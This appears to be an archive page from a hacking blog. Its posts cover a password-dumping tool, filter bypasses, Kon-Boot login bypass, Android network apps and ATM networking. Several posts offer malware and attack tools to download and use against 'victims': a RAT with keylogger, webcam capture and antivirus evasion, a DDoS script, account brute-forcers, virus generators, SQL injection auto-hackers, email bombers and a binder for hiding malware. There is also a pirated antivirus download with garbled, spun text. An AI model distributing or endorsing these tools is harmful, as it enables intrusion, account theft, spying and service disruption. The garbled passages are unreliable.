Connect With Me In Facebook

Welcome to DefendHackers, If u want to Apply for a Blogroll as a Author , With h4ckfreak Mail me @ suren.click@gmail.com

Mark Zuckerberg tells 8th graders “there’s no shortcuts” and to make friends

By h4ckfreak

Metasploit Quick Start Referennce Guide

Metasploit Quick Start Referennce Guide , By h4ckfreak

IP Security

IP Security By H4ckfreak.

15 Network Admin Apps for Android

15 Network Admin Apps for Android , By h4ckfreak

Break All OS Passwords Using KON

Break All OS Passwords Using KON , By h4ckfreak

Recover Or Reset Ur Windows Pwd Using Ubuntu

Recover Or Reset Ur Windows Pwd Using Ubuntu , By h4ckfreak

Security Blueprint For Ethical Hackers..

By h4ckfreak

Blocking IP Using IPSec

By h4ckfreak

Preventing DDos Attacks, Combat Steps abd Tools...

By h4ckfreak

Showing posts with label Tools. Show all posts
Showing posts with label Tools. Show all posts

Saturday, March 10, 2012

WCE v1.3beta 32bit released. (Must needed for Admins)



Download link: http://www.ampliasecurity.com/research/wce_v1_3beta.tgz



Changelog:

version 1.3beta:
March 8, 2012
* Bug fixes
* Extended support to obtain NTLM hashes without code injection
* Added feature to dump login cleartext passwords stored by the Digest
Authentication package


Example:

* Dump cleartext passwords stored by the Digest Authentication package

C:\>wce -w
WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia
Security -
by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.


test\MYDOMAIN:mypass1234
NETWORK SERVICE\WORKGROUP:test


The cleartext passwords dumped include passwords used to login to the
Windows box interactively.

What is WCE?
------------

Windows Credentials Editor (WCE) v1.3beta allows you to

NTLM authentication:

* List logon sessions and add, change, list and delete associated
credentials (e.g.: LM/NT hashes)
* Perform pass-the-hash on Windows natively
* Obtain NT/LM hashes from memory (from interactive logons, services,
remote desktop connections, etc.) which can be
used to authenticate to other systems. WCE can perform this task without
injecting code, just by reading and decrypting information stored in
Windows internal memory structures. It also has the capability to
automatically switch to code injection when the aforementioned method
cannot be performed

Kerberos authentication:

* Dump Kerberos tickets (including the TGT) stored in Windows machines
* Reuse/Load those tickets on another Windows machines, to authenticate
to other systems and services
* Reuse/Load those tickets on *Unix machines, to authenticate to other
systems and services

Digest Authentication:

* Obtain cleartext passwords entered by the user when logging into a
Windows system, and stored by the Windows Digest Authentication security
package


Supported Platforms
-------------------
Windows Credentials Editor supports Windows XP, 2003, Vista, 7 and 2008.


Additional information
----------------------
http://www.ampliasecurity.com/research/wcefaq.html


Thanks,

h@ckfr3ak

Wednesday, September 7, 2011

How to Bypass Firewall restrictions on outgoing Web connections, using SSH Tunneling


The following procedure allows you to get to blocked Websites, from within a LAN which is subject to Firewall restrictions on outgoing HTTP connections (Web Filtering).

Step 1: How to set up an SSH server in Windows, using CopSSH (an implementation for Windows of OpenSSH).






Step 2: How to create an SSH Tunnel to the server, in order to bypass local Firewall restrictions on outgoing HTTP connections.















Doing the same as above, this time while using Linux instead of Windows (combination of Steps 1+2 described above):



Thanks to Ilan Altir

Hope this three will helped u for better understanding

Friday, August 26, 2011

F.B.I RAT (Full Backdoor Intergration) V0.1


Supports xp/Vista/Windows 7, all features have been tested on these OS's including injection, but there have been some limitations on the sniffer.
Features:
File Manager:
-Execute, Normal & Hidden.
-Copy & Paste like Windows explorer.
-Display size of file, and type.
-Delete.
-Download & Upload (re-coded) Multi-threaded downloads, which allows you to download multiple files at once.
-Stop, Pause and resume active transfer's.
-Search files.
-rename files.
System Manager:
-Process Manager - Refresh and kill processes running
-Window Manager - Refresh and close windows, shows hidden and visable windows.
-Installed Programs - List's program name and Directory.
-Installed Services - Lists installed services, allows you to stop, start and pause services.
Keylogger:
-Allows the user to have a time & date stamp, and active window, as well as custom colour coding.
-Uses a keyboard hook, so no dropped keys like most keyloggers, and 0 CPU usage.
-Offline and Online keylogs, Offline keylogs are downloaded once you start the Online keylogger, and once the online keylogger session has finished, the offline keylogger begins again.
Screen capture:
-Reworked transfer & Capture.
-Allows the user to select the quality, intervals of screen shots and stop & start screen capture, also allows the user to take a single snapshot when ever they want.
Webcam:
-Reworked transfer & Capture.
-Allows the user to stop & start captures also allows an interval for the sending of captures.
Packet Sniffer:
-"Net stat" Allows the user to view local connections on the computer, and then select which connection you want to sniff, displays remote server IP and local IP & Port information, also the state of the connection, all this information comes from the TCP stack of windows.
-Packet sniffer, sniffs the raw packets, using windows RAW sockets and formats them into text for you to read, i have tested this with Real world websites, and has allowed me to steal information, such as website logins, but because of the limitations of vista and windows 7 it is likely it will not work, for those two operating systems.
Choice of injection, This source comes with another project that allows you to inject your server into the default browser of the Victim, you can also use the exe and run it normally withoutinjection, for testing, the injection code has been modified from an old source i found, i took the source and improved it, made it detect the default browser and made it load the API's indirectly, so you can encrypt the API strings, and bypass AV's.
Download



If the Link is Broken Check this one too thanks For the anonymous


http://www.megaupload.com/?d=ROHUUZO7

Saturday, August 13, 2011

Download Kaspersky 9.0 Full Version (ANDROID)


android kaspersky
Features:
SMS Find. Basically, if a buzz is absent or stolen, the SMS Find affection pinpoints the device’s area application Google Maps and sends the advice via email to an email abode of the owner’s choice.
SIM Watch. If a bandit tries to about-face the SIM cards in a baseborn phone, the buyer still has the advantage to annul acute data. Remote Block and Delete. Essentially, if a accessory is stolen, the buyer can lock bottomward all advice with the device. This agency no letters or emails can get out or arise in. Pretty handy, no?
If you’ve never approved Kaspersky’s PC program, it’s actual able at sniffing out bacilli and malware, and it looks like they’ve implemented that into their adaptable app as well. There’s an automated clarify for annoying spam argument letters or calls. Users can blow assured that they’re adequate from bacilli as well. Kaspersky Adaptable Aegis 9 searches for and blocks any adverse malware, viruses, or any added aggressive entities on an Android device. Aftermost but not least, the buyer can accredit Kaspersky’s Privacy Protection mode, in which assertive called contacts won’t arise in the abode book, the buzz will not arena if they call, and no notification will arise if they accelerate an SMS message. This is a acceptable apparatus to accumulate prying eyes abroad from assertive information. So analysis out the Kaspersky Adaptable Aegis 9 app and acquaint us what you think!
DOWNLOAD 482 KASPERSKY 9.0 FOR ANDROID FULL VERSION

Download PHP DoS/DDoS Script

image


This script enables you to launch a DoS attack from your server (using that nice high bandwidth connection provided by your hosting provider) to bring your victims server/PC to its knees.
This script should be used responsibly, I did not create it, im merely distributing it for “educational” purposes.

Download PHP DoS script
Search Terms:
ddos script
php dos
php ddos script
php dos script
ddos php script
ddos script php
phpDos
ddos scripts
script DDOS
php ddos
ddos php
denial of service script
dos php
ddos attack script
php ddoser
script php ddos
dos php script
php script ddos
ddos script download
php DDos attack script
script ddos php
PHP DoS Script by Exe
ddos
php dos by exe
ddos skript
mysql ddos
DENIAL OF SERVICE php script
php ddos attack
php ddos download
download script ddos
ddos online
denial of service scripts
PHP DoS/DDoS (Denial Of Service) Script
ddos php tool
php curl ddos
ddos php scripts
script ddos attack
dos script denial
php Dos scripts
php denial of service


Keeep Watching

Saturday, August 6, 2011

15 Network Admin Apps for Android

There’s a mobile app for just about everything under the sun now. You can even find apps designed for network administrators. Here we’ll actually take a look at 15 different apps for the mobile Android platform.

These apps can help you discover, monitor, manage, and connect computers, network services, databases, FTP servers, Windows shares, and more—all from your mobile phone or tablet. They can also serve as a handy reference, such as IP calculators and a database of default login credentials.
ActiveDir Manager (Free or $1.99)
You can perform basic administration of a Windows Active Directory Domain: view and manage users, groups, and computers. Right from your Android you could reset user passwords, disable or edit user accounts, adjust group memberships, and more.
It supports Windows Server 2000, 2003, 2008, and later with StartTLS, SSL, or no encryption. No software required on the server; the app connects directly to AD via Wi-Fi or VPN. Thought the free version saves changes to the AD, it doesn't keep connection details to the server.
Cellica Database for Android ($39.99 after 10-day trial)
You can manage databases located on a Windows computer from your Android via mobile Internet or Wi-Fi. You can edit fields, apply SQL select queries, filters, do sorting, and even create databases right from your Android.
Supported databases include: Microsoft Access, Access 2007, Microsoft Excel, Excel 2007, Oracle, SQL Server, DB2, MySQL, PostgreSQL, FoxPro, dBase, R:BASE and any ODBC Compliant Database. This app does require their software to be installed on the Windows PC, which enables the remote administration secured with 128 bit AES encryption.
AndFTP (Free or $5.67)
This FTP client also supports FTPS and SFTP with SSH RSA/DSA keys. Download or upload files with resume support, and share files via email, messaging, Bluetooth, etc. Perform basic admin tasks, including renaming, deleting, updating permissions, and running custom commands.
The Pro version also supports secure copy protocol (SCP) and folder synchronization.
SharesFinder (Free)
Scans the Wi-Fi network and list computers (with IP, MAC address, and SMB name details) that have shared resources (SMB/Windows shared folders, FTP, HTTP). It is a great quick way to audit shared resources on the network and for simple file sharing.
You can directly connect to SMB shares as a guest or input desired username and password. You can then browse, download, upload, create and delete files and folders. For HTTP resources it launches the Android or other default web browser. To access FTP resources, you need to install a separate FTP client, such as AndFTP.
AndSMB (Free)
This SMB client lets you connect to Windows shares via Wi-Fi and 3G/4G, and features a local and remote file browser. You browse, download, upload, create, delete, and synchronize files and folders. You can send files to a shared printer. It also adds sharing functionality for the gallery: select a photo, hit Share, and upload to a Windows share via AndSMB. You can define a WINS server, LMHOSTS and broadcast address for name resolution.
IP Subnet/Supernet Calculator (Free)
Helps you calculates subnet and supernet information. You can input an IP address, subnet mask and bits, maximum subnets, and hosts per subnet. It can then give you the address range, subnet ID, broadcast address, and the IP binary. Classless Inter-Domain Routing (CIDR) addresses are also support. The Base Converter and translate between decimal, binary, octal and hexadecimal numbers.
RouterPasswords (Free)
This is a database of default credentials for over a thousand routers, gateways, modems, and other network devices. Just type the model or brand and you should be able to find the default login username, password, and protocol.
File Expert (Free)
This is a powerful and feature-packed file manager. In addition to basic file operations (Copy, Paste, Move, Create, etc.), it supports thumbnails of media files, native text and image viewing, and can open and decompress archive files: ZIP, RAR, GZIP, TAR, TGZ, and BZ. It also includes an App Manager, which you can use to do quicker batch uninstalls
It can do web and FTP sharing on a Wi-Fi network.  You can connect from another computer or device on the Wi-Fi network to browse, upload, download, and manage the files on your Android. Additionally, it features a SMB client to connect to Windows shares and a FTP client to do file transfers with a FTP server.
Overlook Fing (Free)
This is a network discovery app that can do TCP port scanning, pinging, traceroute, and DNS lookups on a network via the Wi-Fi connection. At first glance you see your Wi-Fi connection details (SSID, IP details, and speed) and a list of computers or devices on the network along with their details (MAC address, IP and vendor). You can then perform a port scan or ping on a particular node. You can add a custom name, change the icon, and notes to each node.
It saves network scans and allows you to export them. It also features integrated launch of third-party apps for SSH, Telnet, FTP, FTPS, SFTP, SCP, HTTP, HTTPS, and SMB.
G-MoN for Android 2.x (Free)
This is a Wi-Fi and GSM/UMTS scanner with GPS support for doing wardrives. It’s great for mapping the locations of Wi-Fi access points and/or cell towers over a campus or neighborhood. You can see the locations with details, such as encryption, channel, and signal strength, on a live map during the wardrive and also later create a KML file for Google Earth.
Wi-Fi Analyzer (Free)
This is a relativity advanced Wi-Fi stumbler to find and analyze of wireless access points. Maybe use it when configuring APs, doing a site survey, during wireless troubleshooting, or network auditing.
At first glance, you’ll see the details of your Wi-Fi connection (SSID, MAC, and IP) and a list of detected networks with their details: SSID, MAC, supported encryption, channel, and signal in negative dBm levels via a graphical bar and text readout. By default, it groups APs with same identifiers. You can export results and/or take a snapshot of the screens.
It also offers several other views or tools. The channel graph gives you a live look at channel and signal usage by each nearby AP. The time graph gives you similar info but over a period of time, so you can see history of the signals. The channel rating chart gives you recommendations on channel usage. The signal meter view and help you find the location of APs via a visual signal meter and sound.
Exchange by Touchdown ($19.99 after 30-day trial)
This is a third-party Exchange email, contact, calendar, and task client. It provides numerous improvements over the native Exchange client on Android. This includes more supported security polices and encryption of Exchange data and files on the Android device. Since is a great improvement since the platform doesn’t yet fully-support whole device encryption like iOS and BlackBerry do.
ConnectBot (Free)
This is an open Secure Shell (SSH) client that also supports Telnet and local connections. This is great if you work with UNIX-based servers or other network hardware that accepts remote administration. You can generate or import keys, run multiple SSH sessions at once, and copy/paste between other sessions and applications.
PC Monitor ($2.81)
You can securely monitor and manage Windows PCs or servers. It supports up to 3 computers without a subscription or up to 100 or more with a yearly subscription. Monitor all the basics and vitals: status and uptime, CPU and memory usage, and info on events, hardware, network, and hard disks. You can also view and manage the Services, Processes, Scheduled Tasks, logged on users, and more. You can even work via a remote Command Prompt. Plus it supports basic user account management for Active Directory.
Server Monitor (Free)
This is a simple monitoring app to get up and down sound and/or vibrate alerts of TCP connections and SSH tunnels. This is a simple and free way to keep tabs on select computers or servers. You can also define the polling frequency in minutes.

Wednesday, July 6, 2011

Break All OS Passwords Using KON BOOT

There are times when you may need to access a computer but you don’t know the password – this can include running an old machine you haven’t used it for  years, using one purchased at a flea market or online auction, or even the need to quickly access your child’s computer for something. What ever the reason, accessing a computer without knowing the password is fairly simple with this free tool called Kon-Boot .




Of course there are alternatives like Ophcrack,However particularly I think Kon-Boot is the best tool, Which doesn’t ask any questions while gaining access to any PC without knowing its’ password.
Kon- boot is a software that will allow us to access any computer without knowing the password, and without modifying any files on Hard disk. All we have to do is to (just ) insert a boot (cd or floppy) disk Burned with Kon-boot software(110kb) in to any PC , and this offers unlimited access to that machine.

I tested this on one of my end users with special permission through my co-partner, this boot CD got me through the  account with no interruption no password required. I realized while on line, it locked out the account, but when offline I did not have any issues. Now just to make sure my account being the Local Domain Admin I went ahead and tested myself a few times, and thank God can’t access my account,only as a local administrator it’s possible. This is very scary because it forces you to set a bios password, and encrypt your hard drive. So far I have not tested on Vista or Windows 7,


Kon-boot which was initially started as a small project for Linux (mainly Ubuntu),where it allows to log into a Linux system as ‘root’ user without typing the correct password or to elevate privileges from current user to root. Now it was moved to windows platform where it enables Windows users to login to any password protected machine profile without any knowledge of the password.
This program works with the following versions of Windows: XP (SP1, SP2, SP3), Vista (Business, Ultimate), 2000, Server 2003 and 2008, and Windows 7. Kon-Boot also allows you to boot Linux (distributions: Ubuntu, Gentoo, Debian and Fedora) without a password as well.
Windows users doesn’t require any special instructions for using kon-boot , just boot the PC with Kon-Boot CD/Floppy, select your profile and put any password ,that’s all.The funny thing is Zipped version of Kon-boot for CD i.e ISO image is 8.5kb (110 kb after extracting ),where as Zipped version for floppy is 10kb which will goes to 1.4mb after unzipping it.

but I’m sure someone out there can give us some feedback, try it on a 64bit OS maybe it might work. Once you reboot back to your system without the Cd everything should be back to normal.



http://www.piotrbania.com/all/kon-boot/

Tuesday, July 5, 2011

How to run a Windows 7 as Virtual Router


Previously, I had always believed that the only way you could create a fake (aka virtual) access point was using a wireless card that supported monitor mode, Linux, and software like hostapd. Well, with the introduction of Windows Vista/7, Microsoft now requires certified drivers to support monitor mode, which allows the user to (among other things) create virtual access points.


Two free programs that take advantage of this are Connectify (free) and an open-source project (currently in beta) called Virtual Router. Turning your internet connected system into an access point can be useful for certain types of penetration testing, as well as just to allow those around you to access  your internet connection if they are unable to get connectivity.




Connectify Demo:
For more information about Virtual Router, check out the detailed review on freeware genius.

Friday, April 1, 2011

Bypassing Web Filters And Firewalls

There are So many talk Going on Our Group In Facebook Page About Proxy ..and everyone is Giving thier own suggestions(Appreciated), Phil , Risabh , Kevin , Udomang , Dheeraj , BLak dayz ,Tony ..Thank fr all ur suggestions annd i got several set of ideas about that and Same as  Our Defend Hackers Members and i come up with tha Breaking Web Filters,(Since i got Solution for my friend from our group) and there are times when when we are forced to use proxy and we know , with proxy many sites are blocked, But here is a way to bypass all the Webfilters. When a site is blocked , you can use this method to bypass the block!




Lets pretend for a moment that the Internet is made up of 26 websites, A-Z. The web filter blocks your browser from accessing sites X-Z, but not sites A-W. Simply make the browser think you--„¢re going to A-
W. There are a variety of ways to do this:


Proxy Servers:
This is a list of http proxies. These sites may not be up forever, so you may need to search for --“free http proxy--� or --“public proxy servers--� or other similar terms.

Proxy server lists:
-- http://www.aliveproxy.com
-- http://www.multiproxy.org
-- http://www.publicproxyservers.com/index.html
-- http://www.tehbox.com/proxy
-- http://www.proxz.com
-- http://www.proxy4free.com/index.html
-- http://free-proxies.com

Now that you have a list of proxies, you would open IE (internet explorer) and click on Tools > Internet Options > Connections > LAN Settings > Advanced. Enter the address and port of one of the servers from the list in the proper area (http) and make sure the --“use a proxy server for your LAN--� option is selected. Remember to replace the proxy and port at your terminal to the original when you're done.

*Note: Some proxies listed may not work, and this method may decrease your surfing speed. By trying various entries, you--„¢ll find one that works, or works faster.

The infamous translation trick:
Go to a web page translation site and use their services to --“translate a page to English--� thus accessing the blocked page through their trusted site.

You--„¢ll notice that several translation sites are blocked, but by using less popular ones, this method can still be effective. Here is a list of some translation services. Again, these sites may not be up forever, so you may need to search for them.

-- http://babelfish.altavista.com
-- http://world.altavista.com
-- http://translation.langenberg.com
-- http://freetranslation.com/web.thm

Url Scripting:



Url scripting is the easiest method. It works on a select few web filters and is based on the same principal as the translation trick. By typing and address like --“www.yahoo.com@www.restricted_site.com the filter will not go into effect as it recognizes the trusted site (in this case yahoo.com)

Other tricks:
Simply open the command prompt and type:
Ping restricted.com ? restricted.com obviously being the restricted site
At this point you can take down the IP address (ex. 216.109.124.73) and enter it into the browser. If access to the command prompt is also restricted, see --“How to bypass restrictions to get to the command prompt.--� If this article has been taken from information leak, then know that it involves anything from opening the browser, selecting view > source, then saving it as X.bat and opening it to opening a folder or browser and typing in the location of cmd.exe depending on the OS. I will not go into further, as this a completely different topic.

Use https://restrictedsite.com as referring to it as a secured site may confuse the filter.

Note: These are ancient methods that many new filters defend against, but still may be applicable in your situation. If not, a little history never hurt anyone.

Web based Proxies:
Another one of the easier, yet effective methods include web based proxies. These are simple in the fact that you just enter the restricted address and surf! Some of these have some restrictions, like daily usage limits, etc but you can also use another proxy (perhaps one that sucks, like a text only) to bypass their restrictions as well. Here is a list of some:

-- http://proxify.com]http://proxify.com
-- http://www.anonymizer.com/index.cgi]http://www.anonymizer.com/index.cgi
-- http://www.guardster.com/]http://www.guardster.com/
-- http://anonymouse.ws/anonwww.html]http://anonymouse.ws/anonwww.html
-- http://www.the-cloak.com/login.html]http://www.the-cloak.com/login.html
-- https://www.megaproxy.com/freesurf]https://www.megaproxy.com/freesurf
-- http://www.anonymizer.ru]http://www.anonymizer.ru
-- https://nadaily.com/cgi-bin/nph-proxyb.cgi]https://nadaily.com/cgi-bin/nph-proxyb.cgi
-- http://www.userbeam.de/cgi-bin/nph-userbeam.cgi]http://www.userbeam.de/cgi-bin/nph-userbeam.cgi
-- http://www.free2.surffreedom.com/nph-free.cgi]http://www.free2.surffreedom.com/nph-free.cgi

Proxy Programs:
There are many proxy programs that allow you to surf anonymously that are more or less based on the same topics we--„¢ve covered here. I--„¢ve added them just to cover the topic thoroughly:

-- http://www.hotscripts.com/Detailed/28480.html]http://www.hotscripts.com/Detailed/28480.html
-- http://www.inetprivacy.com/a4proxy/anonymous-grc.htm]http://www.inetprivacy.com/a4proxy/anonymous-grc.htm
-- http://www.orangatango.com/home/index.ie.html]http://www.orangatango.com/home/index.ie.html
-- http://www.steganos.com]http://www.steganos.com
-- http://www.anonymization.net]http://www.anonymization.net ? toolbar that requires admin rights to install

Making your own CGI proxy server:

Making your own proxy server may come in handy, but I personally find that simply uploading a txt file/w a list of proxies to a free host makes for a much easier and headache free solution. If you don--„¢t know PERL, there is code out there to help you set it up. Check out these sites for more info:

-- http://httpbridge.sourceforge.net]http://httpbridge.sourceforge.net
-- http://www.jmarshall.com/tools/cgiproxy]http://www.jmarshall.com/tools/cgiproxy



Stay Updated..Wannna Join in our  Group in Facebook for the HARDCORE Technical Discussion... Like us...Write in our Facebook page

Thursday, March 31, 2011

Tools For BLACK, WHITE, GRAY HATS (Updated)


Facebooz
Many people were asking on how to hack facebook account. This tool is design to hack any facebook account you want with 2 simple steps. Specify the username and the pass list and let it work.
It will hack that account and give you the pass.
And for idiots who say that it doesn't work. Well it works but it need times between each attemd to login otherwise it will become a facebooz freezer

http://uploading.com/files/8b949bb8/facebooz.jar/

                             

Brutus
This tool will hack for you any login page by trying all password possibilities. The reason i added here is because many people were finding troubles with there brutus and couldn't do any hack so this one should solve all there nightmares.ha ha ha
http://uploading.com/files/ba745666/Brutus.rar/   

(For readymade logins u can reach www.bugmenot.com)


PassList Generator




Many days ago someone post here in the forum a pass list that is 2GB size. I know that some people cannot download such a file including me so i did some search and found this tool. This software should create the pass list that you need to your brute force. Very small size but very big efficiency.
http://uploading.com/files/f8f9769b/PLG.zip/




In Shadow Batch Virus Gen - 4.1.2



This tool is a virus creater. It will create very proffesional virus. Never test any virus on your PC. Very effective for bad hackers.
password with no quotes: "In shadow"

http://uploading.com/files/FZRK98VO/In%2...2.zip.html


Atomics Virus Creator V.65
This tool is a virus creater. It will create very proffesional virus. Never test any virus on your PC. Very effective for bad hackers
http://uploading.com/files/6CZZN22N/Atom...5.zip.html


Now I will post 3 tools that should be downloaded toghether for better results.
Exploitscanner



This tool will search for vulnarable websites. You only have to write the dock and it will search for potential website to hack. Always use inurl:"article.php?id=1" as a dork.
http://uploading.com/files/19217P2R/expl...r.zip.html


SQL I Helper V.2.7
After you find your potential website , use this tool to auto hack the website using SQL injection. This tool will do all the hard job by itself. Just select buttons to tell here what to do.
You might need to find the pass using the hash method





Admin finder


After you findthe passwords , use this tool to find the admin page login. Some people are heaving problems finding that page. This should solve this problem but remember that can't find all login pages. It use the most common extensions. You have the ability to add more extensions to the list to increase your search range
http://uploading.com/files/KCDVDDST/admi...r.rar.html


cain and abel
Crack PC passwords , hack network connections , sniff , brute , ....................... and all your dirty job.
I don't think i need to explain what does this tool do. Everyone know about and how neccesary it for hacking job.

http://uploading.com/files/m55616a9/cain%2526abel.rar/


w32 disassembler degguer
This tool will help you to disassemble any program you want. Very effective for programmers
http://uploading.com/files/CX9JY7UR/w32%...r.rar.html


72389 Email Bomber
This tool will help you to spam any email you want. This one is special because you have the ability to spam from different email at the same time. All credit go to Nathan72389
http://uploading.com/files/ZC2HM6E1/7238...r.rar.html


Simple Binder
Use this tool to bind any 2 files in a single file. You are not restricted to jpg or mp3 files but you can bind any type of file. It is very effective to hide virus and worms and all malwares type. All credits go Nathan72389
http://uploading.com/files/SEQDHH33/Simp...9.rar.html


Hotmail Hacker And Messenger Fun
This tool will help you to hack any Hotmail messenger you want. It simply work by making the person think he can hack email using it while in the reality he is the one to be hacked. All credit go to Nathan72389
http://uploading.com/files/9c8ae7f5/Hotm...2BFun.rar/


Gmail Hacker
This tool will help you to hack any Gmail you want. It simply work by making the person think he can hack email using it while in the reality he is the one to be hacked. All credit go to Nathan72389
http://uploading.com/files/d7f79mm9/Gmail%2Bhacker.rar/


Chat Spammer
Use this tool to spam any chat room. Write what phrase you want it to be spammed. I am still try to figure out the best way to use it. Very funny and worst to try it
http://uploading.com/files/D7YJGAI9/Chat...r.rar.html


1st Mass Mailer 4.2
This tool will help you to mass spam emails. Little bit compliacted but very very effective.
Serial: "18935379480889"
Thanks to 88power88 for the serial

http://uploading.com/files/17m9mc69/1stM...ler42.rar/


My lock box
Many people were asking for tools to hide files and folders. This tool will hide the files that you don't want anyone to see it by hiding it inside a box that the software create and to make it impossible to anyone to reach it. Very easy to use
http://uploading.com/files/O0PDO80I/mylo...p.exe.html


I lock
Same as the one before but this one is more proffessional. This tool will hide the files that you don't want anyone to see it by hiding it inside a box that the software create and to make it impossible to anyone to reach it.
http://uploading.com/files/9m8d4e29/ilockstp.rar/


Lock an exe
This tool will lock any ".exe" file by making it not working anymore. If you click on the new exe , it won't execute. Ability to share it between PCs safetly at a condition that these 2 pc have this tools to lock it and unlock it
http://uploading.com/files/XIG3N1MN/lockanexe.zip.html


Icon Changer v3.8
Some people were asking for tools that can change the icon for there files. Use this tool to change the icons of any thing you want on your PC. Customize anything that have a icon interference.
http://uploading.com/files/VJHMKK2V/Icon...8.zip.html



FYI...Using GMAIL HACKER tools is at ur Own rick..i cant claim any responsibility

Thursday, August 5, 2010

ATM A COMPLETE GUIDE

   ATM   
(Asynchronous Transfer Mode) A network technology for both local and wide area networks (LANs and WANs) that supports realtime voice and video as well as data. The topology uses switches that establish a logical circuit from end to end, which guarantees quality of service (QoS). However, unlike telephone switches that dedicate circuits end to end, unused bandwidth in ATM's logical circuits can be appropriated when needed. For example, idle bandwidth in a videoconference circuit can be used to transfer data.
ATM is widely used as a backbone technology in carrier networks and large enterprises, but never became popular as a local network (LAN) topology (see below). ATM is highly scalable and supports transmission speeds of 1.5, 25, 100, 155, 622, 2488 and 9953 Mbps ). ATM is also running as slow as 9.6 Kbps between ships at sea. An ATM switch can be added into the middle of a switch fabric to enhance total capacity, and the new switch is automatically updated using ATM's PNNI routing protocol.
    Cell Switching   

ATM works by transmitting all traffic as fixed-length, 53-byte cells. This fixed unit allows very fast switches to be built, because it is much faster to process a known packet size than to figure out the start and end of variable length packets. The small ATM packet also ensures that voice and video can be inserted into the stream often enough for realtime transmission.
ATM works at layer 2 of the OSI model and typically uses SONET (OC-3, OC-12, etc.) for framing and error correction out over the wire. ATM switches convert cells to SONET frames and frames to cells at the port interface.
    Quality of Service (QoS)   

The ability to specify a quality of service is one of ATM's most important features, allowing voice and video to be transmitted smoothly. The following levels of service are available:
Constant Bit Rate (CBR) guarantees bandwidth for realtime voice and video.
Realtime variable Bit Rate (rt-VBR) supports interactive multimedia that requires minimal delays, and non-realtime variable bit rate (nrt-VBR) is used for bursty transaction traffic.
Available Bit Rate (ABR) adjusts bandwidth according to congestion levels for LAN traffic.
Unspecified Bit Rate (UBR) provides a best effort for non-critical data such as file transfers.
     MPOA and LANE   

MPOA (Multiprotocol Over ATM) is used to route protocols such as TCP/IP and IPX while preserving ATM quality of service. LANE (LAN Emulation) is used to interconnect Ethernet and Token Ring LANs by encapsulating their frames in LANE packets and converting them into ATM cells. MPOA route servers or traditional routers are used to internetwork LAN segments. .
    History of ATM   

When ATM came on the scene in the early 1990s, it was thought to be the beginning of a new era in networking, because it was both a LAN and WAN technology that could start at the desktop and go straight through to the remote office. Its ability to provide quality of service from end to end was highly praised as the perfect multimedia transport. In addition, ATM came from the telephone world, which had always delivered the highest quality communications.
    It Never Happened   

ATM never became the magic end-to-end solution. ATM adapters for the desktop were expensive, and standards for interconnecting existing networks to an ATM backbone were confusing and often delayed. When Gigabit Ethernet was announced, providing a 10-fold increase in speed and using a familiar technology, ATM's demise in the LAN arena was assured.
    A Carrier's Transport   

ATM succeeded in the carriers' networks, being deployed by major telephone companies and ISPs and sizable private enterprises. It was always installed for mission critical backbones because of its quality of service (QoS).
ATM in the Enterprise
This shows how ATM is used as a network backbone or "switch fabric" within the enterprise. The edge device is an Ethernet workgroup switch with a high-speed ATM link. It converts LAN packets into ATM cells and vice versa.


ATM in the Internet
ATM is widely used by large carriers and ISPs. It serves as the backbone between points of presence (POPs), and it is also used at the NAP and MAE interconnecting points.
Where ATM Fits In
ATM performs its functions at layer 2 of the OSI model and converts its cells into SONET frames (OC-3, OC-12, etc.) or T-carrier frames (DS1, DS3) to go out over the wire.
ATM Switch
ATM switches such as this are used in large networks, including Internet backbones. This model has a 40 Gbps backplane that supports 16 OC-48 (2.4 Gbps) ports. (Image courtesy of Marconi Communications.)


 
    Asynchronous Transfer Mode      from the WikiPedia
Asynchronous Transfer Mode, or ATM for short, is a which encodes data traffic into small fixed-sized (53 byte; 48 bytes of data and 5 bytes of header information) cells instead of variable sized packets as in (such as the or ). It is a technology, in which a connection is established between the two endpoints before the actual data exchange begins.

Introduction

ATM was intended to provide a single unified networking standard that could support both channel networking (, ) and packet-based networking (, , etc), whilst supporting multiple levels of for packet traffic.
ATM sought to resolve the conflict between networks and networks by mapping both bitstreams and packet-streams onto a stream of small fixed-size 'cells' tagged with identifiers. The cells are typically sent on demand within a synchronous time-slot pattern in a synchronous bit-stream: what is asynchronous here is the sending of the cells, not the low-level bitstream that carries them.
In its original conception, ATM was to be the enabling technology of the 'Broadband Integrated Services Digital Network' () that would replace the existing . The full suite of ATM standards provides definitions for (physical connections), (data link layer) and (network) of the classical . The ATM standards drew on concepts from the telecommunications community, rather than the computer networking community. For this reason, extensive provision was made for integration of most existing technologies and conventions into ATM.
As a result, ATM provides a highly complex technology, with features intended for applications ranging from global telco networks to private local area computer networks. ATM has been a partial success as a technology, with widespread deployment, but generally only used as a transport for IP traffic; its goal of providing a single integrated technology for LANs, public networks, and user services has largely failed.

Successes and Failures of ATM Technology

Numerous have implemented wide-area ATM networks, and many implementations use ATM. However, ATM has failed to gain wide use as a technology, and its great complexity has held back its full deployment as the single integrating network technology in the way that its inventors originally intended.
Many people, particularly in the Internet protocol-design community, considered this vision to be mistaken. Their argument went something like this: We know that there will always be both brand-new and obsolescent link-layer technologies, particularly in the LAN area, and it is fair to assume that not all of them will fit neatly into the model that ATM was designed for. Therefore, some sort of protocol is needed to provide a unifying layer over both ATM and non-ATM link layers, and ATM itself cannot fill that role. Conveniently, we have this protocol called "IP" which already does that. Ergo, there is no point in implementing ATM at the network layer.
In addition, the need for cells to reduce jitter has disappeared as transport speeds increased (see below), and improvements in have made the integration of speech and data possible at the IP layer, again removing the incentive for ubiquitous deployment of ATM. Most telcos are now planning to integrate their voice network activities into their IP networks, rather than vice versa..
Many technically sound ideas from ATM were adopted by , a generic packet switching protocol. ATM remains widely deployed, and is used as a service in networks, where its compromises fit DSL's low-data-rate needs well. In turn, DSL networks support IP (and IP services such as VoIP) via.
ATM will remain deployed for some time in higher-speed interconnects where carriers have already committed themselves to existing ATM deployments; ATM is used here as a way of unifying /SDH traffic and packet-switched traffic under a single infrastructure.
However, ATM is increasingly challenged by speed and traffic shaping requirements of converged networks. In particular, the complexity of imposes a performance bottleneck, as the fastest SARs known run at 2.5 Gbit/s and have limited traffic shaping capabilities.
Currently it seems like implementations (10Gbit-Ethernet, MetroEthernet) will replace ATM in many locations. Enables convergence of Voice, Video, Data on one network

Recent Developments

Interest in using native ATM for carrying live video and audio has increased recently. In these environments, low latency and very high quality of service are required to handle linear audio and video streams. Towards this goal standards are being developed such as (). Compare with .

ATM Concepts

Why Cells?

